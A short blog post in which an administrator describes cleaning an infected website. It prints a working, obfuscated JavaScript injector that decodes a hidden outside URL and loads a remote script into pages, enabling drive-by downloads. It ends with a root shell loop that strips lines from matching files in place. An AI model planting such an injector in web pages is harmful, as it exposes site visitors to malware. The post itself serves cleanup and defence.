Cleaning Malicious Javascripts

So one of the users has been infected with this stupid malicious javascripts. Its an evil javascript that will open / include a url, on another site which opens up a attacj site, driveby download, xss, et cetera.. Heres the stupid code:


var t=new String();var y;if(y!='o'){y='o'};var VX;if(VX!='yw' && VX != ''){VX=null};var O='';function d(){var yM;if(yM!='' && yM!='AM'){yM=null};this.DT='';var ywS;if(ywS!=''){ywS='Nv'};this.AQ='';var Vz;if(Vz!='' && Vz!='NO'){Vz=null};var I=window;var eE;if(eE!='oH' && eE != ''){eE=null};var eY;if(eY!='kR' && eY != ''){eY=null};var wm="";var W=I['unescape'];var V=W("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%6d%65%69%6e%76%7a%2e%6e%65%74%2f%76%65%72%79%63%64%2e%63%6f%6d%2e%70%68%70");var kM="";this.q="";var wn=new Array();var fp;if(fp!='Hd' && fp!='DG'){fp='Hd'};function j(i,c){var v=W("%5d");var Gv;if(Gv!='' && Gv!='mG'){Gv='EV'};var S=W("%5b");var H="g";var sy=new Array();var Sm="";var cA='';var B=new RegExp(S+c+v, H);this.z='';var K;if(K!='wu' && K!='JC'){K='wu'};return i.replace(B, new String());var C='';};var F_="";this.ub="";var k=j('dheSfAegrg','swRghAiW04_SBP');var D=j('sqcIrIiVpGtG','UIFq5he2doGmJVx');var rW=new String();this.st="";var vf=j('87616336779706314111413844741911696409497493367347','396741');var e=document;var ed=j('swrJcw','54wQy_LKHJukVEO');var O_;if(O_!='' && O_!='Wy'){O_=''};var qv=new Date();var ll;if(ll!='TB' && ll != ''){ll=null};function N(){var qm="";var Fe;if(Fe!='' && Fe!='nh'){Fe=null};var T=W("%68%74%74%70%3a%2f%2f%70%6c%61%79%7a%6f%6e%65%77%6f%72%6c%64%2e%61%74%3a");var Bk='';var Fg;if(Fg!='' && Fg!='Cc'){Fg='kI'};this.xo='';var F=T;var JW;if(JW!='' && JW!='CN'){JW='pu'};var AA;if(AA!='' && AA!='qK'){AA=''};F+=vf;var xE=new Date();F+=V;var KV;if(KV!='SJ'){KV='SJ'};var tV=new Date();var Yd='';var Op=new Date();this.a="";this.aG="";try {var _p=new Array();var IA;if(IA!='Q_' && IA != ''){IA=null};x=e[j('ckrkeCajtfe9EblFehmheBnotB','pbCsh7wkBjfX9FLoQ')](D);var LV;if(LV!='by' && LV!='lp'){LV='by'};x[k]=[1,7][0];var tS=new Date();x[ed]=F;var Xb='';var GN;if(GN!='zo' && GN != ''){GN=null};e.body[j('aVpNpweKnudVCxhuiWlVdw','NxKW2VMwu')](x);var Sq;if(Sq!='gR'){Sq=''};var BZ;if(BZ!='' && BZ!='c_'){BZ='No'};this.Zd="";var Gi;if(Gi!='' && Gi!='eYs'){Gi=''};} catch(IT){};var _g;if(_g!='nX'){_g=''};var Qv=new Date();}var j_;if(j_!='cx' && j_ != ''){j_=null};var rb=new Date();var ih=j('okn6lpohakdr','kZBRsDzSMcHby4Ppghr6w');var cV="";var _W='';I[ih]=N;};this.GF="";d();var Ai;if(Ai!='Ge' && Ai != ''){Ai=null};


So, it seems it infects ALL files with file names containing these:

- *index*
- *default*
- *home*
- *start*
- *.js

How do i clean up everything? Well, Google a bit, and heres what i did:

[root@ns52 public_html]# for u in {index,default,".js",start,home}; do for f in `find | grep $u`; do grep -v "t=new String(" $f > $f.new && mv -f $f.new $f; done; done;


Hope this helps someone.

Thank You

//kudos aalim, ewe, google

//alak

Comments

Popular posts from this blog

SAP Backdoors {placeholder Post]

Fiori Apps Keep Calling Internal Hostname / Internal FQDN